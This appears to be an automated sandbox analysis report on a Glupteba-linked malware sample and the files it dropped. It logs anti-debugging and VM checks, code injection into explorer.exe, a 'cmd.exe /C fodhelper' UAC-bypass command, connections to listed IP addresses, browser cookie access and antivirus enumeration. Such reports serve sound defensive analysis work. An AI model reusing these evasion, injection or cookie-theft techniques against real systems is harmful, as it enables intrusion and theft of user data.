Source: 820.exe, 00000006.00000002.4438186480.0000000003930000.00000004.00000020.00020000.00000000.sdmp, 820.exe, 00000006.00000003.3240107468.0000000005163000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntor-onion-key zeABkSC5U36c9jPkbqVUzrjd6qt+/Rti3yHGfsRtYhY
Source: 820.exe, 00000006.00000003.3259679503.000000000516E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBAJtcCCBEuPXqEMu2rREZdSYB+1TY6HE/BWrbN1/ZfMwxUulfEocqfD/3
Source: 820.exe, 00000006.00000002.4438718091.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBAMZvmci/v9lu2mS+O/M3cUaAMvMrIOsTCKVWdgTHvKYn6UHCdNCgnztj
Source: 820.exe, 00000006.00000003.2580801912.0000000003398000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
Source: 16E6.exe, 00000007.00000003.2535613987.0000000000689000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 820.exe, 00000006.00000003.2580801912.0000000003398000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBALTKLm+Dn2//Wdsm4wVkqC6KdyxM64ihWRVmcinNdv7gngpzrQ45dqJm
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: 820.exe, 00000006.00000003.2614068499.00000000033A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBANR5BdXVbpdMX3Ob1V3BfuQemU8uU69NjLB2JC4zlLSJaVSbQRjWJMEV
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.2029828719.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2030558145.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000002.00000000.2029828719.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000002.00000000.2029828719.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: 820.exe, 00000006.00000003.2621223084.000000000459C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntor-onion-key xagLdjTNZ7neGETsosZMKDpjlmHhhQLIVmCieMsBKW0
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2029099333.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: 820.exe, 00000006.00000002.4434552865.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2030558145.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

Code function: 0_2_004029BA LdrLoadDll,

0_2_004029BA

Source: C:\Users\user\AppData\Local\Temp\820.exe

Code function: 6_2_006943E0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_006943E0

Source: C:\Users\user\AppData\Local\Temp\820.exe

6_2_0069D030

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_004D092B mov eax, dword ptr fs:[00000030h]	0_2_004D092B
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_004D0D90 mov eax, dword ptr fs:[00000030h]	0_2_004D0D90
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0050DAA3 push dword ptr fs:[00000030h]	0_2_0050DAA3
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0048092B mov eax, dword ptr fs:[00000030h]	4_2_0048092B
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00480D90 mov eax, dword ptr fs:[00000030h]	4_2_00480D90
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_004BCB63 push dword ptr fs:[00000030h]	4_2_004BCB63
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 5_2_051FA0A3 push dword ptr fs:[00000030h]	5_2_051FA0A3
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 5_2_053C0042 push dword ptr fs:[00000030h]	5_2_053C0042
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_023090A3 push dword ptr fs:[00000030h]	7_2_023090A3

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

Code function: 0_2_0041B968 GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,

0_2_0041B968

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_0040B24C SetUnhandledExceptionFilter,	0_2_0040B24C
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: 0_2_00413EFE SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00413EFE
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_0040B24C SetUnhandledExceptionFilter,	4_2_0040B24C
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: 4_2_00413EFE SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00413EFE
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 6_2_006943E0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_006943E0
Source: C:\Users\user\AppData\Local\Temp\820.exe	Code function: 6_2_00694A78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00694A78
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_005205E9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_005205E9
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_00520F9B IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00520F9B
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: 7_2_024F1202 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_024F1202

Source: C:\Users\user\AppData\Local\Temp\28CC.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 1C75.dll.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 34.143.166.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.198.2.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.94.245.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.42.65.125 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.158.3.162 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.168.30 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.130.138 80	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 91.215.85.17 80

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\820.exe

Code function: 5_2_053C0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

5_2_053C0110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Thread created: C:\Windows\explorer.exe EIP: 8381AD0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	Thread created: unknown EIP: 1111AD0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Thread created: unknown EIP: 8511930

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\820.exe	Memory written: C:\Users\user\AppData\Local\Temp\820.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe	Memory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Memory written: C:\Users\user\AppData\Local\Temp\toolspub2.exe base: 400000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 6480 base: 7E79C0 value: 90			Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3576 base: 7FF6747E2D10 value: 90			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eieeggj	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Writes to foreign memory regions

Source: C:\Windows\explorer.exe

Memory written: C:\Windows\SysWOW64\explorer.exe base: 7E79C0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\820.exe	Process created: C:\Users\user\AppData\Local\Temp\820.exe C:\Users\user\AppData\Local\Temp\820.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5340 -ip 5340	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 716	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5340 -ip 5340	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 724	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5340 -ip 5340	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 780	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5340 -ip 5340	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 864	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5836 -ip 5836	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5836 -s 360	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe "C:\Users\user\AppData\Local\Temp\InstallSetup9.exe"
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup9.exe "C:\Users\user\AppData\Local\Temp\InstallSetup9.exe"
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe"
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\16E6.exe

Code function: 7_2_0041C05B _invalid_parameter_noinfo_noreturn,GetKeyboardLayout,GetLocaleInfoW,memset,_invalid_parameter_noinfo_noreturn,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,memset,memmove,memset,LocalFree,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,_invalid_parameter_noinfo_noreturn,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,memmove,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_CxxThrowException,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

7_2_0041C05B

Source: explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2029528295.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2029528295.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2030426360.0000000004B00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2029528295.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2029528295.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2029099333.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\AppData\Local\Temp\16E6.exe

Code function: 7_2_00521199 cpuid

7_2_00521199

Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: GetLocaleInfoW,	0_2_0041404F
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: ___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,	0_2_0040B002
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: GetLocaleInfoW,	0_2_00414036
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	0_2_004140B9
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: ___crtGetLocaleInfoW,	0_2_0040B0BE
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: __crtGetLocaleInfoA_stat,	0_2_004141F8
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	0_2_004171BE
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: _LcidFromHexString,GetLocaleInfoA,	0_2_004172D5
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	0_2_0041736D
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_004175B3
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: GetLocaleInfoA,	0_2_0041C657
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: EnumSystemLocalesA,	0_2_00417676
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_004176A0
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__itoa_s,	0_2_00417743
Source: C:\Users\user\Desktop\16GAuqLUFK.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00417707
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: GetLocaleInfoW,	4_2_0041404F
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: ___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,	4_2_0040B002
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: GetLocaleInfoW,	4_2_00414036
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	4_2_004140B9
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: ___crtGetLocaleInfoW,	4_2_0040B0BE
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: __crtGetLocaleInfoA_stat,	4_2_004141F8
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	4_2_004171BE
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: _LcidFromHexString,GetLocaleInfoA,	4_2_004172D5
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	4_2_0041736D
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_004175B3
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: GetLocaleInfoA,	4_2_0041C657
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: EnumSystemLocalesA,	4_2_00417676
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_004176A0
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__itoa_s,	4_2_00417743
Source: C:\Users\user\AppData\Roaming\eieeggj	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_00417707
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Code function: _invalid_parameter_noinfo_noreturn,GetKeyboardLayout,GetLocaleInfoW,memset,_invalid_parameter_noinfo_noreturn,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,memset,memmove,memset,LocalFree,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,_invalid_parameter_noinfo_noreturn,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,memmove,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_CxxThrowException,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	7_2_0041C05B

Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\820.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Proccesses.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Google Chrome_Cookies_2023-12-24T10_44_51.689063+01_00_00.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\16E6.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\28CC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3ABE.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3ABE.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

Code function: 0_2_0040B939 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0040B939

Source: C:\Users\user\Desktop\16GAuqLUFK.exe

Code function: 0_2_0041C9EE __get_daylight,__get_daylight,__get_daylight,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,GetTimeZoneInformation,

0_2_0041C9EE

Source: C:\Users\user\AppData\Local\Temp\820.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\16E6.exe	WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\28CC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Glupteba

Source: Yara match	File source: 22.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.288c47bbc1871b439df19ff4df68f076.exe.3840000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.288c47bbc1871b439df19ff4df68f076.exe.400000.6.unpack, type: UNPACKEDPE
